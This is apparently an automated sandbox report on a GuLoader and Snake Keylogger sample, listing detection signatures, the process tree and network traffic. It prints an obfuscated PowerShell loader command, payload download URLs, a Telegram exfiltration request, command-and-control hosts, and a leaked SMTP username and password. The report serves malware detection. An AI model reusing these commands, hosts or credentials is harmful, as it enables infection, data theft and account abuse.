Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
uPDwUy9ewY.exe

Overview

General Information

Sample name:uPDwUy9ewY.exe
renamed because original name is a hash value
Original sample name:567c3776afcd2c7dfb3b07e4c6dd281c0dcdc770ed2827c9a84cccaf3fe97d6c.exe
Analysis ID:1631823
MD5:0425118557aa95ea418a0b15dd072078
SHA1:9c09bdbe6282db2e5d6d55456df456100c133e33
SHA256:567c3776afcd2c7dfb3b07e4c6dd281c0dcdc770ed2827c9a84cccaf3fe97d6c
Tags:exeuser-adrian__luca
Infos:

Detection

GuLoader, Snake Keylogger
Score:100
Range:0 - 100
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Early bird code injection technique detected
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected GuLoader
Yara detected Snake Keylogger
Yara detected Telegram RAT
AI detected suspicious PE digital signature
Found suspicious powershell code related to unpacking or dynamic code loading
Joe Sandbox ML detected suspicious sample
Loading BitLocker PowerShell Module
Powershell drops PE file
Queues an APC in another process (thread injection)
Tries to detect the country of the analysis system (by using the IP)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses the Telegram API (likely for C&C communication)
Writes to foreign memory regions
Checks if the current process is being debugged
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to detect virtual machines (SLDT)
Contains functionality to dynamically determine API calls
Contains functionality to shutdown / reboot the system
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Msiexec Initiated Connection
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer

Classification

Process Tree

  • System is w10x64
  • uPDwUy9ewY.exe (PID: 7000 cmdline: "C:\Users\user\Desktop\uPDwUy9ewY.exe" MD5: 0425118557AA95EA418A0B15DD072078)
    • powershell.exe (PID: 7164 cmdline: "powershell.exe" -windowstyle minimized "$Cloudage=gc -Raw 'C:\Users\user\AppData\Roaming\Kalkvrksarbejderen84\chego\reverensens\Ainaleh.Sie';$Oceanologerne=$Cloudage.SubString(8795,3);.$Oceanologerne($Cloudage)" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 6168 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • msiexec.exe (PID: 3488 cmdline: "C:\Windows\SysWOW64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)
  • svchost.exe (PID: 2724 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
CloudEyE, GuLoaderCloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye
NameDescriptionAttributionBlogpost URLsLink
404 Keylogger, Snake KeyloggerSnake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger

Malware Configuration

Threatname: Snake Keylogger

{"Exfil Mode": "SMTP", "Username": "comercial@veyremaagricola.com", "Password": "Com@120613", "Host": "smtp.ionos.es", "Port": "587", "Version": "4.4"}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000005.00000002.2142843540.0000000021D51000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_SnakeKeyloggerYara detected Snake KeyloggerJoe Security
    00000005.00000002.2126368645.0000000005712000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
      00000002.00000002.1284819779.000000000A212000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
        Process Memory Space: msiexec.exe PID: 3488JoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          Process Memory Space: msiexec.exe PID: 3488JoeSecurity_TelegramRATYara detected Telegram RATJoe Security

            Sigma Signatures

            System Summary

            barindex
            Sigma detected: Msiexec Initiated Connection
            Source: Network ConnectionAuthor: frack113: Data: DestinationIp: 142.250.184.238, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\SysWOW64\msiexec.exe, Initiated: true, ProcessId: 3488, Protocol: tcp, SourceIp: 192.168.2.8, SourceIsIpv6: false, SourcePort: 49690
            Sigma detected: Potential Binary Or Script Dropper Via PowerShell
            Source: File createdAuthor: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 7164, TargetFilename: C:\Users\user\AppData\Roaming\Kalkvrksarbejderen84\chego\reverensens\protoporphyrin\uPDwUy9ewY.exe
            Sigma detected: Non Interactive PowerShell Process Spawned
            Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "powershell.exe" -windowstyle minimized "$Cloudage=gc -Raw 'C:\Users\user\AppData\Roaming\Kalkvrksarbejderen84\chego\reverensens\Ainaleh.Sie';$Oceanologerne=$Cloudage.SubString(8795,3);.$Oceanologerne($Cloudage)", CommandLine: "powershell.exe" -windowstyle minimized "$Cloudage=gc -Raw 'C:\Users\user\AppData\Roaming\Kalkvrksarbejderen84\chego\reverensens\Ainaleh.Sie';$Oceanologerne=$Cloudage.SubString(8795,3);.$Oceanologerne($Cloudage)", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\uPDwUy9ewY.exe", ParentImage: C:\Users\user\Desktop\uPDwUy9ewY.exe, ParentProcessId: 7000, ParentProcessName: uPDwUy9ewY.exe, ProcessCommandLine: "powershell.exe" -windowstyle minimized "$Cloudage=gc -Raw 'C:\Users\user\AppData\Roaming\Kalkvrksarbejderen84\chego\reverensens\Ainaleh.Sie';$Oceanologerne=$Cloudage.SubString(8795,3);.$Oceanologerne($Cloudage)", ProcessId: 7164, ProcessName: powershell.exe
            Sigma detected: Windows Processes Suspicious Parent Directory
            Source: Process startedAuthor: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 628, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 2724, ProcessName: svchost.exe

            Suricata Signatures

            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2025-03-07T16:20:58.171618+010028033053Unknown Traffic192.168.2.849694104.21.80.1443TCP
            2025-03-07T16:21:01.488549+010028033053Unknown Traffic192.168.2.849696104.21.80.1443TCP
            2025-03-07T16:21:22.728681+010028033053Unknown Traffic192.168.2.849708104.21.80.1443TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2025-03-07T16:20:52.107397+010028032742Potentially Bad Traffic192.168.2.849692132.226.247.7380TCP
            2025-03-07T16:20:55.498049+010028032742Potentially Bad Traffic192.168.2.849692132.226.247.7380TCP
            2025-03-07T16:20:58.982448+010028032742Potentially Bad Traffic192.168.2.849695132.226.247.7380TCP
            2025-03-07T16:21:02.294940+010028032742Potentially Bad Traffic192.168.2.849697132.226.247.7380TCP
            2025-03-07T16:21:05.810613+010028032742Potentially Bad Traffic192.168.2.849699132.226.247.7380TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2025-03-07T16:20:44.422857+010028032702Potentially Bad Traffic192.168.2.849690142.250.184.238443TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2025-03-07T16:21:26.055869+010018100071Potentially Bad Traffic192.168.2.849709149.154.167.220443TCP

            Joe Sandbox Signatures

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Antivirus / Scanner detection for submitted sample
            Source: uPDwUy9ewY.exeAvira: detected
            Antivirus detection for dropped file
            Source: C:\Users\user\AppData\Roaming\Kalkvrksarbejderen84\chego\reverensens\protoporphyrin\uPDwUy9ewY.exeAvira: detection malicious, Label: TR/Injector.bjagk
            Found malware configuration
            Source: 00000005.00000002.2142843540.0000000021D51000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: Snake Keylogger {"Exfil Mode": "SMTP", "Username": "comercial@veyremaagricola.com", "Password": "Com@120613", "Host": "smtp.ionos.es", "Port": "587", "Version": "4.4"}
            Multi AV Scanner detection for dropped file
            Source: C:\Users\user\AppData\Roaming\Kalkvrksarbejderen84\chego\reverensens\protoporphyrin\uPDwUy9ewY.exeReversingLabs: Detection: 65%
            Source: C:\Users\user\AppData\Roaming\Kalkvrksarbejderen84\chego\reverensens\protoporphyrin\uPDwUy9ewY.exeVirustotal: Detection: 72%Perma Link
            Multi AV Scanner detection for submitted file
            Source: uPDwUy9ewY.exeVirustotal: Detection: 72%Perma Link
            Source: uPDwUy9ewY.exeReversingLabs: Detection: 65%
            Joe Sandbox ML detected suspicious sample
            Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.8% probability

            Location Tracking

            barindex
            Tries to detect the country of the analysis system (by using the IP)
            Source: unknownDNS query: name: reallyfreegeoip.org
            Source: uPDwUy9ewY.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
            Source: unknownHTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.8:49693 version: TLS 1.0
            Source: unknownHTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.8:49696 version: TLS 1.0
            Source: unknownHTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.8:49698 version: TLS 1.0
            Source: unknownHTTPS traffic detected: 142.250.184.238:443 -> 192.168.2.8:49690 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 172.217.16.193:443 -> 192.168.2.8:49691 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.8:49709 version: TLS 1.2
            Source: C:\Users\user\Desktop\uPDwUy9ewY.exeCode function: 0_2_00405E6B FindFirstFileA,FindClose,0_2_00405E6B
            Source: C:\Users\user\Desktop\uPDwUy9ewY.exeCode function: 0_2_00405427 GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,0_2_00405427
            Source: C:\Users\user\Desktop\uPDwUy9ewY.exeCode function: 0_2_00402647 FindFirstFileA,0_2_00402647
            Source: C:\Users\user\Desktop\uPDwUy9ewY.exeFile opened: C:\Users\userJump to behavior
            Source: C:\Users\user\Desktop\uPDwUy9ewY.exeFile opened: C:\Users\user\AppDataJump to behavior
            Source: C:\Users\user\Desktop\uPDwUy9ewY.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Windows\INetCacheJump to behavior
            Source: C:\Users\user\Desktop\uPDwUy9ewY.exeFile opened: C:\Users\user\AppData\Local\Microsoft\WindowsJump to behavior
            Source: C:\Users\user\Desktop\uPDwUy9ewY.exeFile opened: C:\Users\user\AppData\LocalJump to behavior
            Source: C:\Users\user\Desktop\uPDwUy9ewY.exeFile opened: C:\Users\user\AppData\Local\MicrosoftJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 02DBF45Dh5_2_02DBF2C0
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 02DBF45Dh5_2_02DBF4AC
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 02DBFC19h5_2_02DBF974

            Networking

            barindex
            Suricata IDS alerts for network traffic
            Source: Network trafficSuricata IDS: 1810007 - Severity 1 - Joe Security ANOMALY Telegram Send Message : 192.168.2.8:49709 -> 149.154.167.220:443
            Uses the Telegram API (likely for C&C communication)
            Source: unknownDNS query: name: api.telegram.org
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:648351%0D%0ADate%20and%20Time:%2008/03/2025%20/%2017:53:59%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20648351%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
            Source: Joe Sandbox ViewIP Address: 149.154.167.220 149.154.167.220
            Source: Joe Sandbox ViewIP Address: 104.21.80.1 104.21.80.1
            Source: Joe Sandbox ViewIP Address: 104.21.80.1 104.21.80.1
            Source: Joe Sandbox ViewIP Address: 132.226.247.73 132.226.247.73
            Source: Joe Sandbox ViewJA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
            Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
            Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
            Source: unknownDNS query: name: checkip.dyndns.org
            Source: unknownDNS query: name: reallyfreegeoip.org
            Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.8:49695 -> 132.226.247.73:80
            Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.8:49692 -> 132.226.247.73:80
            Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.8:49699 -> 132.226.247.73:80
            Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.8:49697 -> 132.226.247.73:80
            Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49696 -> 104.21.80.1:443
            Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.8:49690 -> 142.250.184.238:443
            Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49694 -> 104.21.80.1:443
            Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49708 -> 104.21.80.1:443
            Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1yKfDg3PpWLffwNU9njUbVE2-z3yqmi6n HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0Host: drive.google.comCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /download?id=1yKfDg3PpWLffwNU9njUbVE2-z3yqmi6n&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: unknownHTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.8:49693 version: TLS 1.0
            Source: unknownHTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.8:49696 version: TLS 1.0
            Source: unknownHTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.8:49698 version: TLS 1.0
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1yKfDg3PpWLffwNU9njUbVE2-z3yqmi6n HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0Host: drive.google.comCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /download?id=1yKfDg3PpWLffwNU9njUbVE2-z3yqmi6n&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:648351%0D%0ADate%20and%20Time:%2008/03/2025%20/%2017:53:59%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20648351%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficDNS traffic detected: DNS query: drive.google.com
            Source: global trafficDNS traffic detected: DNS query: drive.usercontent.google.com
            Source: global trafficDNS traffic detected: DNS query: checkip.dyndns.org
            Source: global trafficDNS traffic detected: DNS query: reallyfreegeoip.org
            Source: global trafficDNS traffic detected: DNS query: api.telegram.org
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Fri, 07 Mar 2025 15:21:25 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
            Source: msiexec.exe, 00000005.00000002.2142843540.0000000021D51000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://aborters.duckdns.org:8081
            Source: msiexec.exe, 00000005.00000002.2142843540.0000000021D51000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anotherarmy.dns.army:8081
            Source: msiexec.exe, 00000005.00000002.2142843540.0000000021D51000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org
            Source: msiexec.exe, 00000005.00000002.2142843540.0000000021D51000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/
            Source: svchost.exe, 00000004.00000002.2128766647.00000233FD600000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.ver)
            Source: qmgr.db.4.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFU
            Source: qmgr.db.4.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaa5khuklrahrby256zitbxd5wq_1.0.2512.1/n
            Source: qmgr.db.4.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaxuysrwzdnwqutaimsxybnjbrq_2023.9.25.0/
            Source: qmgr.db.4.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adhioj45hzjkfunn7ccrbqyyhu3q_20230916.567
            Source: qmgr.db.4.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adqyi2uk2bd7epzsrzisajjiqe_9.48.0/gcmjkmg
            Source: qmgr.db.4.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/dix4vjifjljmfobl3a7lhcpvw4_414/lmelglejhe
            Source: edb.log.4.drString found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
            Source: uPDwUy9ewY.exe, uPDwUy9ewY.exe.2.drString found in binary or memory: http://nsis.sf.net/NSIS_Error
            Source: uPDwUy9ewY.exe, uPDwUy9ewY.exe.2.drString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
            Source: powershell.exe, 00000002.00000002.1260332107.0000000005AE4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
            Source: powershell.exe, 00000002.00000002.1255613084.0000000004BD6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
            Source: powershell.exe, 00000002.00000002.1255613084.0000000004BD6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
            Source: powershell.exe, 00000002.00000002.1255613084.0000000004A81000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.2142843540.0000000021D51000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
            Source: powershell.exe, 00000002.00000002.1255613084.0000000004BD6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
            Source: msiexec.exe, 00000005.00000002.2142843540.0000000021D51000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://varders.kozow.com:8081
            Source: powershell.exe, 00000002.00000002.1255613084.0000000004BD6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
            Source: msiexec.exe, 00000005.00000002.2145064589.000000002302C000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.2145064589.0000000023068000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org?q=
            Source: powershell.exe, 00000002.00000002.1255613084.0000000004A81000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lB/r
            Source: powershell.exe, 00000002.00000002.1255613084.0000000004BD6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/winsvr-2022-pshelp
            Source: msiexec.exe, 00000005.00000002.2142843540.0000000021E48000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org
            Source: msiexec.exe, 00000005.00000002.2142843540.0000000021E48000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot
